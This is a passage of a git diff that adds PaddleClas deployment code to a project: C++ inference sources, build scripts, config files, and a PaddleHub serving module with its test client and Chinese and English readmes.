std::cout << "=======End of Paddle Class inference config======" << std::endl; +} + +} // namespace PaddleClas \ No newline at end of file diff --git a/Smart_container/PaddleClas/deploy/cpp/src/main.cpp b/Smart_container/PaddleClas/deploy/cpp/src/main.cpp new file mode 100644 index 0000000..4fc191b --- /dev/null +++ b/Smart_container/PaddleClas/deploy/cpp/src/main.cpp @@ -0,0 +1,107 @@ +// Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. 
+// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. + +#include "opencv2/core.hpp" +#include "opencv2/imgcodecs.hpp" +#include "opencv2/imgproc.hpp" +#include +#include +#include +#include +#include +#include + +#include +#include +#include + +#include +#include +#include + +using namespace std; +using namespace cv; +using namespace PaddleClas; + +int main(int argc, char **argv) { + if (argc < 3) { + std::cerr << "[ERROR] usage: " << argv[0] + << " configure_filepath image_path\n"; + exit(1); + } + + ClsConfig config(argv[1]); + + config.PrintConfigInfo(); + + std::string path(argv[2]); + + std::vector img_files_list; + if (cv::utils::fs::isDirectory(path)) { + std::vector filenames; + cv::glob(path, filenames); + for (auto f : filenames) { + img_files_list.push_back(f); + } + } else { + img_files_list.push_back(path); + } + + std::cout << "img_file_list length: " << img_files_list.size() << std::endl; + + Classifier classifier(config.cls_model_path, config.cls_params_path, + config.use_gpu, config.gpu_id, config.gpu_mem, + config.cpu_threads, config.use_mkldnn, + config.use_tensorrt, config.use_fp16, + config.resize_short_size, config.crop_size); + + double elapsed_time = 0.0; + std::vector cls_times; + int warmup_iter = img_files_list.size() > 5 ? 5 : 0; + for (int idx = 0; idx < img_files_list.size(); ++idx) { + std::string img_path = img_files_list[idx]; + cv::Mat srcimg = cv::imread(img_path, cv::IMREAD_COLOR); + if (!srcimg.data) { + std::cerr << "[ERROR] image read failed! 
image path: " << img_path + << "\n"; + exit(-1); + } + + cv::cvtColor(srcimg, srcimg, cv::COLOR_BGR2RGB); + + double run_time = classifier.Run(srcimg, &cls_times); + if (idx >= warmup_iter) { + elapsed_time += run_time; + std::cout << "Current image path: " << img_path << std::endl; + std::cout << "Current time cost: " << run_time << " s, " + << "average time cost in all: " + << elapsed_time / (idx + 1 - warmup_iter) << " s." << std::endl; + } else { + std::cout << "Current time cost: " << run_time << " s." << std::endl; + } + } + + std::string presion = "fp32"; + + if (config.use_fp16) + presion = "fp16"; + if (config.benchmark) { + AutoLogger autolog("Classification", config.use_gpu, config.use_tensorrt, + config.use_mkldnn, config.cpu_threads, 1, + "1, 3, 224, 224", presion, cls_times, + img_files_list.size()); + autolog.report(); + } + return 0; +} diff --git a/Smart_container/PaddleClas/deploy/cpp/src/preprocess_op.cpp b/Smart_container/PaddleClas/deploy/cpp/src/preprocess_op.cpp new file mode 100644 index 0000000..72bdb81 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/cpp/src/preprocess_op.cpp @@ -0,0 +1,90 @@ +// Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. 
+ +#include "opencv2/core.hpp" +#include "opencv2/imgcodecs.hpp" +#include "opencv2/imgproc.hpp" +#include "paddle_api.h" +#include "paddle_inference_api.h" +#include +#include +#include +#include +#include + +#include +#include +#include +#include + +#include + +namespace PaddleClas { + +void Permute::Run(const cv::Mat *im, float *data) { + int rh = im->rows; + int rw = im->cols; + int rc = im->channels(); + for (int i = 0; i < rc; ++i) { + cv::extractChannel(*im, cv::Mat(rh, rw, CV_32FC1, data + i * rh * rw), i); + } +} + +void Normalize::Run(cv::Mat *im, const std::vector &mean, + const std::vector &scale, const bool is_scale) { + double e = 1.0; + if (is_scale) { + e /= 255.0; + } + (*im).convertTo(*im, CV_32FC3, e); + for (int h = 0; h < im->rows; h++) { + for (int w = 0; w < im->cols; w++) { + im->at(h, w)[0] = + (im->at(h, w)[0] - mean[0]) * scale[0]; + im->at(h, w)[1] = + (im->at(h, w)[1] - mean[1]) * scale[1]; + im->at(h, w)[2] = + (im->at(h, w)[2] - mean[2]) * scale[2]; + } + } +} + +void CenterCropImg::Run(cv::Mat &img, const int crop_size) { + int resize_w = img.cols; + int resize_h = img.rows; + int w_start = int((resize_w - crop_size) / 2); + int h_start = int((resize_h - crop_size) / 2); + cv::Rect rect(w_start, h_start, crop_size, crop_size); + img = img(rect); +} + +void ResizeImg::Run(const cv::Mat &img, cv::Mat &resize_img, + int resize_short_size) { + int w = img.cols; + int h = img.rows; + + float ratio = 1.f; + if (h < w) { + ratio = float(resize_short_size) / float(h); + } else { + ratio = float(resize_short_size) / float(w); + } + + int resize_h = round(float(h) * ratio); + int resize_w = round(float(w) * ratio); + + cv::resize(img, resize_img, cv::Size(resize_w, resize_h)); +} + +} // namespace PaddleClas \ No newline at end of file diff --git a/Smart_container/PaddleClas/deploy/cpp/src/utility.cpp b/Smart_container/PaddleClas/deploy/cpp/src/utility.cpp new file mode 100644 index 0000000..e6b572a --- /dev/null +++ 
b/Smart_container/PaddleClas/deploy/cpp/src/utility.cpp @@ -0,0 +1,39 @@ +// Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. + +#include +#include +#include + +#include + +namespace PaddleClas { + +std::vector Utility::ReadDict(const std::string &path) { + std::ifstream in(path); + std::string line; + std::vector m_vec; + if (in) { + while (getline(in, line)) { + m_vec.push_back(line); + } + } else { + std::cout << "no such label file: " << path << ", exit the program..." + << std::endl; + exit(1); + } + return m_vec; +} + +} // namespace PaddleClas \ No newline at end of file diff --git a/Smart_container/PaddleClas/deploy/cpp/tools/build.sh b/Smart_container/PaddleClas/deploy/cpp/tools/build.sh new file mode 100644 index 0000000..0a3aa04 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/cpp/tools/build.sh @@ -0,0 +1,20 @@ +OPENCV_DIR=/work/project/project/cpp_infer/opencv-3.4.7/opencv3 +LIB_DIR=/work/project/project/cpp_infer/paddle_inference/ +CUDA_LIB_DIR=/usr/local/cuda/lib64 +CUDNN_LIB_DIR=/usr/lib/x86_64-linux-gnu/ + +BUILD_DIR=build +rm -rf ${BUILD_DIR} +mkdir ${BUILD_DIR} +cd ${BUILD_DIR} +cmake .. 
\ + -DPADDLE_LIB=${LIB_DIR} \ + -DWITH_MKL=ON \ + -DWITH_GPU=OFF \ + -DWITH_STATIC_LIB=OFF \ + -DUSE_TENSORRT=OFF \ + -DOPENCV_DIR=${OPENCV_DIR} \ + -DCUDNN_LIB=${CUDNN_LIB_DIR} \ + -DCUDA_LIB=${CUDA_LIB_DIR} \ + +make -j diff --git a/Smart_container/PaddleClas/deploy/cpp/tools/config.txt b/Smart_container/PaddleClas/deploy/cpp/tools/config.txt new file mode 100644 index 0000000..0d915a9 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/cpp/tools/config.txt @@ -0,0 +1,17 @@ +# model load config +use_gpu 0 +gpu_id 0 +gpu_mem 4000 +cpu_threads 10 +use_mkldnn 1 +use_tensorrt 0 +use_fp16 0 + +# cls config +cls_model_path /PaddleClas/inference/cls_infer.pdmodel +cls_params_path /PaddleClas/inference/cls_infer.pdiparams +resize_short_size 256 +crop_size 224 + +# for log env info +benchmark 0 diff --git a/Smart_container/PaddleClas/deploy/cpp/tools/run.sh b/Smart_container/PaddleClas/deploy/cpp/tools/run.sh new file mode 100644 index 0000000..1c70aaa --- /dev/null +++ b/Smart_container/PaddleClas/deploy/cpp/tools/run.sh @@ -0,0 +1 @@ +./build/clas_system ./tools/config.txt ./docs/imgs/ILSVRC2012_val_00000666.JPEG diff --git a/Smart_container/PaddleClas/deploy/hubserving/clas/__init__.py b/Smart_container/PaddleClas/deploy/hubserving/clas/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/Smart_container/PaddleClas/deploy/hubserving/clas/config.json b/Smart_container/PaddleClas/deploy/hubserving/clas/config.json new file mode 100644 index 0000000..647036f --- /dev/null +++ b/Smart_container/PaddleClas/deploy/hubserving/clas/config.json @@ -0,0 +1,16 @@ +{ + "modules_info": { + "clas_system": { + "init_args": { + "version": "1.0.0", + "use_gpu": true, + "enable_mkldnn": false + }, + "predict_args": { + } + } + }, + "port": 8866, + "use_multiprocess": false, + "workers": 2 +} diff --git a/Smart_container/PaddleClas/deploy/hubserving/clas/module.py b/Smart_container/PaddleClas/deploy/hubserving/clas/module.py new file mode 100644 index 0000000..98ec1d9 
--- /dev/null +++ b/Smart_container/PaddleClas/deploy/hubserving/clas/module.py @@ -0,0 +1,100 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import os +import sys +sys.path.insert(0, ".") + +import time + +import numpy as np +import paddle.nn as nn +from paddlehub.module.module import moduleinfo, serving + +from hubserving.clas.params import get_default_confg +from python.predict_cls import ClsPredictor +from utils import config +from utils.encode_decode import b64_to_np + + +@moduleinfo( + name="clas_system", + version="1.0.0", + summary="class system service", + author="paddle-dev", + author_email="paddle-dev@baidu.com", + type="cv/class") +class ClasSystem(nn.Layer): + def __init__(self, use_gpu=None, enable_mkldnn=None): + """ + initialize with the necessary elements + """ + self._config = self._load_config( + use_gpu=use_gpu, enable_mkldnn=enable_mkldnn) + self.cls_predictor = ClsPredictor(self._config) + + def _load_config(self, use_gpu=None, enable_mkldnn=None): + cfg = get_default_confg() + cfg = config.AttrDict(cfg) + config.create_attr_dict(cfg) + if use_gpu is not None: + cfg.Global.use_gpu = use_gpu + if enable_mkldnn is not None: + cfg.Global.enable_mkldnn = enable_mkldnn + cfg.enable_benchmark = False + if cfg.Global.use_gpu: + try: + _places = os.environ["CUDA_VISIBLE_DEVICES"] + int(_places[0]) + print("Use GPU, GPU Memery:{}".format(cfg.Global.gpu_mem)) + 
print("CUDA_VISIBLE_DEVICES: ", _places) + except: + raise RuntimeError( + "Environment Variable CUDA_VISIBLE_DEVICES is not set correctly. If you wanna use gpu, please set CUDA_VISIBLE_DEVICES via export CUDA_VISIBLE_DEVICES=cuda_device_id." + ) + else: + print("Use CPU") + print("Enable MKL-DNN") if enable_mkldnn else None + return cfg + + def predict(self, inputs): + if not isinstance(inputs, list): + raise Exception( + "The input data is inconsistent with expectations.") + + starttime = time.time() + outputs = self.cls_predictor.predict(inputs) + elapse = time.time() - starttime + return {"prediction": outputs, "elapse": elapse} + + @serving + def serving_method(self, images, revert_params): + """ + Run as a service. + """ + input_data = b64_to_np(images, revert_params) + results = self.predict(inputs=list(input_data)) + return results + + +if __name__ == "__main__": + import cv2 + import paddlehub as hub + + module = hub.Module(name="clas_system") + img_path = "./hubserving/ILSVRC2012_val_00006666.JPEG" + img = cv2.imread(img_path)[:, :, ::-1] + img = cv2.resize(img, (224, 224)).transpose((2, 0, 1)) + res = module.predict([img.astype(np.float32)]) + print("The returned result of {}: {}".format(img_path, res)) diff --git a/Smart_container/PaddleClas/deploy/hubserving/clas/params.py b/Smart_container/PaddleClas/deploy/hubserving/clas/params.py new file mode 100644 index 0000000..9d9c0dd --- /dev/null +++ b/Smart_container/PaddleClas/deploy/hubserving/clas/params.py @@ -0,0 +1,42 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. 
+# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + + +def get_default_confg(): + return { + 'Global': { + "inference_model_dir": "../inference/", + "batch_size": 1, + 'use_gpu': False, + 'use_fp16': False, + 'enable_mkldnn': False, + 'cpu_num_threads': 1, + 'use_tensorrt': False, + 'ir_optim': False, + "gpu_mem": 8000, + 'enable_profile': False, + "enable_benchmark": False + }, + 'PostProcess': { + 'main_indicator': 'Topk', + 'Topk': { + 'topk': 5, + 'class_id_map_file': './utils/imagenet1k_label_list.txt' + } + } + } diff --git a/Smart_container/PaddleClas/deploy/hubserving/readme.md b/Smart_container/PaddleClas/deploy/hubserving/readme.md new file mode 100644 index 0000000..6b2b2dd --- /dev/null +++ b/Smart_container/PaddleClas/deploy/hubserving/readme.md @@ -0,0 +1,188 @@ +[English](readme_en.md) | 简体中文 + +# 基于PaddleHub Serving的服务部署 + +hubserving服务部署配置服务包`clas`下包含3个必选文件,目录如下: +``` +hubserving/clas/ + └─ __init__.py 空文件,必选 + └─ config.json 配置文件,可选,使用配置启动服务时作为参数传入 + └─ module.py 主模块,必选,包含服务的完整逻辑 + └─ params.py 参数文件,必选,包含模型路径、前后处理参数等参数 +``` + +## 快速启动服务 +### 1. 准备环境 +```shell +# 安装paddlehub,请安装2.0版本 +pip3 install paddlehub==2.1.0 --upgrade -i https://pypi.tuna.tsinghua.edu.cn/simple +``` + +### 2. 
下载推理模型 +安装服务模块前,需要准备推理模型并放到正确路径,默认模型路径为: +``` +分类推理模型结构文件:PaddleClas/inference/inference.pdmodel +分类推理模型权重文件:PaddleClas/inference/inference.pdiparams +``` + +**注意**: +* 模型文件路径可在`PaddleClas/deploy/hubserving/clas/params.py`中查看和修改: + ```python + "inference_model_dir": "../inference/" + ``` + 需要注意,模型文件(包括.pdmodel与.pdiparams)名称必须为`inference`。 +* 我们也提供了大量基于ImageNet-1k数据集的预训练模型,模型列表及下载地址详见[模型库概览](../../docs/zh_CN/models/models_intro.md),也可以使用自己训练转换好的模型。 + +### 3. 安装服务模块 +针对Linux环境和Windows环境,安装命令如下。 + +* 在Linux环境下,安装示例如下: +```shell +cd PaddleClas/deploy +# 安装服务模块: +hub install hubserving/clas/ +``` + +* 在Windows环境下(文件夹的分隔符为`\`),安装示例如下: + +```shell +cd PaddleClas\deploy +# 安装服务模块: +hub install hubserving\clas\ +``` + +### 4. 启动服务 +#### 方式1. 命令行命令启动(仅支持CPU) +**启动命令:** +```shell +$ hub serving start --modules Module1==Version1 \ + --port XXXX \ + --use_multiprocess \ + --workers \ +``` + +**参数:** +|参数|用途| +|-|-| +|--modules/-m| [**必选**] PaddleHub Serving预安装模型,以多个Module==Version键值对的形式列出
*`当不指定Version时,默认选择最新版本`*| +|--port/-p| [**可选**] 服务端口,默认为8866| +|--use_multiprocess| [**可选**] 是否启用并发方式,默认为单进程方式,推荐多核CPU机器使用此方式
*`Windows操作系统只支持单进程方式`*| +|--workers| [**可选**] 在并发方式下指定的并发任务数,默认为`2*cpu_count-1`,其中`cpu_count`为CPU核数| + +如按默认参数启动服务: ```hub serving start -m clas_system``` + +这样就完成了一个服务化API的部署,使用默认端口号8866。 + +#### 方式2. 配置文件启动(支持CPU、GPU) +**启动命令:** +```hub serving start -c config.json``` + +其中,`config.json`格式如下: +```json +{ + "modules_info": { + "clas_system": { + "init_args": { + "version": "1.0.0", + "use_gpu": true, + "enable_mkldnn": false + }, + "predict_args": { + } + } + }, + "port": 8866, + "use_multiprocess": false, + "workers": 2 +} +``` + +- `init_args`中的可配参数与`module.py`中的`_initialize`函数接口一致。其中, + - 当`use_gpu`为`true`时,表示使用GPU启动服务。 + - 当`enable_mkldnn`为`true`时,表示使用MKL-DNN加速。 +- `predict_args`中的可配参数与`module.py`中的`predict`函数接口一致。 + +**注意:** +- 使用配置文件启动服务时,其他参数会被忽略。 +- 如果使用GPU预测(即,`use_gpu`置为`true`),则需要在启动服务之前,设置CUDA_VISIBLE_DEVICES环境变量,如:```export CUDA_VISIBLE_DEVICES=0```,否则不用设置。 +- **`use_gpu`不可与`use_multiprocess`同时为`true`**。 +- **`use_gpu`与`enable_mkldnn`同时为`true`时,将忽略`enable_mkldnn`,而使用GPU**。 + +如,使用GPU 3号卡启动串联服务: +```shell +cd PaddleClas/deploy +export CUDA_VISIBLE_DEVICES=3 +hub serving start -c hubserving/clas/config.json +``` + +## 发送预测请求 +配置好服务端,可使用以下命令发送预测请求,获取预测结果: + +```shell +cd PaddleClas/deploy +python hubserving/test_hubserving.py server_url image_path +``` + +需要给脚本传递2个必须参数: +- **server_url**:服务地址,格式为 +`http://[ip_address]:[port]/predict/[module_name]` +- **image_path**:测试图像路径,可以是单张图片路径,也可以是图像集合目录路径。 +- **batch_size**:[**可选**] 以`batch_size`大小为单位进行预测,默认为`1`。 +- **resize_short**:[**可选**] 预处理时,按短边调整大小,默认为`256`。 +- **crop_size**:[**可选**] 预处理时,居中裁剪的大小,默认为`224`。 +- **normalize**:[**可选**] 预处理时,是否进行`normalize`,默认为`True`。 +- **to_chw**:[**可选**] 预处理时,是否调整为`CHW`顺序,默认为`True`。 + +**注意**:如果使用`Transformer`系列模型,如`DeiT_***_384`, `ViT_***_384`等,请注意模型的输入数据尺寸,需要指定`--resize_short=384 --crop_size=384`。 + + +访问示例: +```shell +python hubserving/test_hubserving.py --server_url http://127.0.0.1:8866/predict/clas_system --image_file ./hubserving/ILSVRC2012_val_00006666.JPEG 
--batch_size 8 +``` + +### 返回结果格式说明 +返回结果为列表(list),包含top-k个分类结果,以及对应的得分,还有此图片预测耗时,具体如下: +``` +list: 返回结果 +└─ list: 第一张图片结果 + └─ list: 前k个分类结果,依score递减排序 + └─ list: 前k个分类结果对应的score,依score递减排序 + └─ float: 该图分类耗时,单位秒 +``` + +**说明:** 如果需要增加、删除、修改返回字段,可对相应模块进行修改,完整流程参考下一节自定义修改服务模块。 + +## 自定义修改服务模块 +如果需要修改服务逻辑,你一般需要操作以下步骤: + +- 1、 停止服务 +```hub serving stop --port/-p XXXX``` + +- 2、 到相应的`module.py`和`params.py`等文件中根据实际需求修改代码。`module.py`修改后需要重新安装(`hub install hubserving/clas/`)并部署。在进行部署前,可通过`python hubserving/clas/module.py`测试已安装服务模块。 + +- 3、 卸载旧服务包 +```hub uninstall clas_system``` + +- 4、 安装修改后的新服务包 +```hub install hubserving/clas/``` + +- 5、重新启动服务 +```hub serving start -m clas_system``` + +**注意**: +常用参数可在[params.py](./clas/params.py)中修改: + * 更换模型,需要修改模型文件路径参数: + ```python + "inference_model_dir": + ``` + * 更改后处理时返回的`top-k`结果数量: + ```python + 'topk': + ``` + * 更改后处理时的lable与class id对应映射文件: + ```python + 'class_id_map_file': + ``` + +为了避免不必要的延时以及能够以batch_size进行预测,数据预处理逻辑(包括resize、crop等操作)在客户端完成,因此需要在[test_hubserving.py](./test_hubserving.py#L35-L52)中修改。 diff --git a/Smart_container/PaddleClas/deploy/hubserving/readme_en.md b/Smart_container/PaddleClas/deploy/hubserving/readme_en.md new file mode 100644 index 0000000..bb0ddbd --- /dev/null +++ b/Smart_container/PaddleClas/deploy/hubserving/readme_en.md @@ -0,0 +1,199 @@ +English | [简体中文](readme.md) + +# Service deployment based on PaddleHub Serving + +HubServing service pack contains 3 files, the directory is as follows: +``` +hubserving/clas/ + └─ __init__.py Empty file, required + └─ config.json Configuration file, optional, passed in as a parameter when using configuration to start the service + └─ module.py Main module file, required, contains the complete logic of the service + └─ params.py Parameter file, required, including parameters such as model path, pre- and post-processing parameters +``` + +## Quick start service +### 1. 
Prepare the environment +```shell +# Install version 2.0 of PaddleHub +pip3 install paddlehub==2.1.0 --upgrade -i https://pypi.tuna.tsinghua.edu.cn/simple +``` + +### 2. Download inference model +Before installing the service module, you need to prepare the inference model and put it in the correct path. The default model path is: + +``` +Model structure file: PaddleClas/inference/inference.pdmodel +Model parameters file: PaddleClas/inference/inference.pdiparams +``` + +* The model file path can be viewed and modified in `PaddleClas/deploy/hubserving/clas/params.py`. + + It should be noted that the prefix of model structure file and model parameters file must be `inference`. + +* More models provided by PaddleClas can be obtained from the [model library](../../docs/en/models/models_intro_en.md). You can also use models trained by yourself. + +### 3. Install Service Module + +* On Linux platform, the examples are as follows. +```shell +cd PaddleClas/deploy +hub install hubserving/clas/ +``` + +* On Windows platform, the examples are as follows. +```shell +cd PaddleClas\deploy +hub install hubserving\clas\ +``` + +### 4. Start service +#### Way 1. Start with command line parameters (CPU only) + +**start command:** +```shell +$ hub serving start --modules Module1==Version1 \ + --port XXXX \ + --use_multiprocess \ + --workers \ +``` +**parameters:** + +|parameters|usage| +|-|-| +|--modules/-m|PaddleHub Serving pre-installed model, listed in the form of multiple Module==Version key-value pairs
*`When Version is not specified, the latest version is selected by default`*| +|--port/-p|Service port, default is 8866| +|--use_multiprocess|Enable concurrent mode, the default is single-process mode, this mode is recommended for multi-core CPU machines
*`Windows operating system only supports single-process mode`*| +|--workers|The number of concurrent tasks specified in concurrent mode, the default is `2*cpu_count-1`, where `cpu_count` is the number of CPU cores| + +For example, start the 2-stage series service: +```shell +hub serving start -m clas_system +``` + +This completes the deployment of a service API, using the default port number 8866. + +#### Way 2. Start with configuration file(CPU、GPU) +**start command:** +```shell +hub serving start --config/-c config.json +``` +Wherein, the format of `config.json` is as follows: +```json +{ + "modules_info": { + "clas_system": { + "init_args": { + "version": "1.0.0", + "use_gpu": true, + "enable_mkldnn": false + }, + "predict_args": { + } + } + }, + "port": 8866, + "use_multiprocess": false, + "workers": 2 +} +``` +- The configurable parameters in `init_args` are consistent with the `_initialize` function interface in `module.py`. Among them, + - when `use_gpu` is `true`, it means that the GPU is used to start the service. + - when `enable_mkldnn` is `true`, it means that use MKL-DNN to accelerate. +- The configurable parameters in `predict_args` are consistent with the `predict` function interface in `module.py`. + +**Note:** +- When using the configuration file to start the service, other parameters will be ignored. +- If you use GPU prediction (that is, `use_gpu` is set to `true`), you need to set the environment variable CUDA_VISIBLE_DEVICES before starting the service, such as: ```export CUDA_VISIBLE_DEVICES=0```, otherwise you do not need to set it. +- **`use_gpu` and `use_multiprocess` cannot be `true` at the same time.** +- **When both `use_gpu` and `enable_mkldnn` are set to `true` at the same time, GPU is used to run and `enable_mkldnn` will be ignored.** + +For example, use GPU card No. 
3 to start the service
+ +``` +list: The returned results +└─ list: The result of first picture + └─ list: The top-k classification results, sorted in descending order of score + └─ list: The scores corresponding to the top-k classification results, sorted in descending order of score + └─ float: The time cost of predicting the picture, unit second +``` + +**Note:** If you need to add, delete or modify the returned fields, you can modify the corresponding module. For the details, refer to the user-defined modification service module in the next section. + +## User defined service module modification +If you need to modify the service logic, the following steps are generally required: + +1. Stop service +```shell +hub serving stop --port/-p XXXX +``` + +2. Modify the code in the corresponding files, like `module.py` and `params.py`, according to the actual needs. You need re-install(hub install hubserving/clas/) and re-deploy after modifing `module.py`. +After modifying and installing and before deploying, you can use `python hubserving/clas/module.py` to test the installed service module. + +For example, if you need to replace the model used by the deployed service, you need to modify model path parameters `cfg.model_file` and `cfg.params_file` in `params.py`. Of course, other related parameters may need to be modified at the same time. Please modify and debug according to the actual situation. + +3. Uninstall old service module +```shell +hub uninstall clas_system +``` + +4. Install modified service module +```shell +hub install hubserving/clas/ +``` + +5. 
Restart service +```shell +hub serving start -m clas_system +``` + +**Note**: + +Common parameters can be modified in params.py: +* Directory of model files(include model structure file and model parameters file): + ```python + "inference_model_dir": + ``` +* The number of Top-k results returned during post-processing: + ```python + 'topk': + ``` +* Mapping file corresponding to label and class ID during post-processing: + ```python + 'class_id_map_file': + ``` + +In order to avoid unnecessary delay and be able to predict in batch, the preprocessing (include resize, crop and other) is completed in the client, so modify [test_hubserving.py](./test_hubserving.py#L35-L52) if necessary. diff --git a/Smart_container/PaddleClas/deploy/hubserving/test_hubserving.py b/Smart_container/PaddleClas/deploy/hubserving/test_hubserving.py new file mode 100644 index 0000000..e5d2aca --- /dev/null +++ b/Smart_container/PaddleClas/deploy/hubserving/test_hubserving.py @@ -0,0 +1,165 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +import os +import sys +__dir__ = os.path.dirname(os.path.abspath(__file__)) +sys.path.append(os.path.abspath(os.path.join(__dir__, '../'))) + +import time +import requests +import json +import base64 +import argparse + +import numpy as np +import cv2 + +from utils import logger +from utils.get_image_list import get_image_list +from utils import config +from utils.encode_decode import np_to_b64 +from python.preprocess import create_operators + + +def get_args(): + def str2bool(v): + return v.lower() in ("true", "t", "1") + + parser = argparse.ArgumentParser() + parser.add_argument("--server_url", type=str) + parser.add_argument("--image_file", type=str) + parser.add_argument("--batch_size", type=int, default=1) + parser.add_argument("--resize_short", type=int, default=256) + parser.add_argument("--crop_size", type=int, default=224) + parser.add_argument("--normalize", type=str2bool, default=True) + parser.add_argument("--to_chw", type=str2bool, default=True) + return parser.parse_args() + + +class PreprocessConfig(object): + def __init__(self, + resize_short=256, + crop_size=224, + normalize=True, + to_chw=True): + self.config = [{ + 'ResizeImage': { + 'resize_short': resize_short + } + }, { + 'CropImage': { + 'size': crop_size + } + }] + if normalize: + self.config.append({ + 'NormalizeImage': { + 'scale': 0.00392157, + 'mean': [0.485, 0.456, 0.406], + 'std': [0.229, 0.224, 0.225], + 'order': '' + } + }) + if to_chw: + self.config.append({'ToCHWImage': None}) + + def __call__(self): + return self.config + + +def main(args): + image_path_list = get_image_list(args.image_file) + headers = {"Content-type": "application/json"} + preprocess_ops = create_operators( + PreprocessConfig(args.resize_short, args.crop_size, args.normalize, + args.to_chw)()) + + cnt = 0 + predict_time = 0 + all_score = 0.0 + start_time = time.time() + + img_data_list = [] + img_name_list = [] + cnt = 0 + for idx, img_path in enumerate(image_path_list): + img = cv2.imread(img_path) + if img 
is None: + logger.warning( + f"Image file failed to read and has been skipped. The path: {img_path}" + ) + continue + else: + for ops in preprocess_ops: + img = ops(img) + img = np.array(img) + img_data_list.append(img) + + img_name = img_path.split('/')[-1] + img_name_list.append(img_name) + cnt += 1 + if cnt % args.batch_size == 0 or (idx + 1) == len(image_path_list): + inputs = np.array(img_data_list) + b64str, revert_shape = np_to_b64(inputs) + data = { + "images": b64str, + "revert_params": { + "shape": revert_shape, + "dtype": str(inputs.dtype) + } + } + try: + r = requests.post( + url=args.server_url, + headers=headers, + data=json.dumps(data)) + r.raise_for_status + if r.json()["status"] != "000": + msg = r.json()["msg"] + raise Exception(msg) + except Exception as e: + logger.error(f"{e}, in file(s): {img_name_list[0]} etc.") + continue + else: + results = r.json()["results"] + preds = results["prediction"] + elapse = results["elapse"] + + cnt += len(preds) + predict_time += elapse + + for number, result_list in enumerate(preds): + all_score += result_list["scores"][0] + pred_str = ", ".join( + [f"{k}: {result_list[k]}" for k in result_list]) + logger.info( + f"File:{img_name_list[number]}, The result(s): {pred_str}" + ) + + finally: + img_data_list = [] + img_name_list = [] + + total_time = time.time() - start_time + logger.info("The average time of prediction cost: {:.3f} s/image".format( + predict_time / cnt)) + logger.info("The average time cost: {:.3f} s/image".format(total_time / + cnt)) + logger.info("The average top-1 score: {:.3f}".format(all_score / cnt)) + + +if __name__ == '__main__': + args = get_args() + main(args) diff --git a/Smart_container/PaddleClas/deploy/lite/Makefile b/Smart_container/PaddleClas/deploy/lite/Makefile new file mode 100644 index 0000000..f18864a --- /dev/null +++ b/Smart_container/PaddleClas/deploy/lite/Makefile @@ -0,0 +1,68 @@ +ARM_ABI = arm8 +export ARM_ABI + +include ../Makefile.def + +LITE_ROOT=../../../ + 
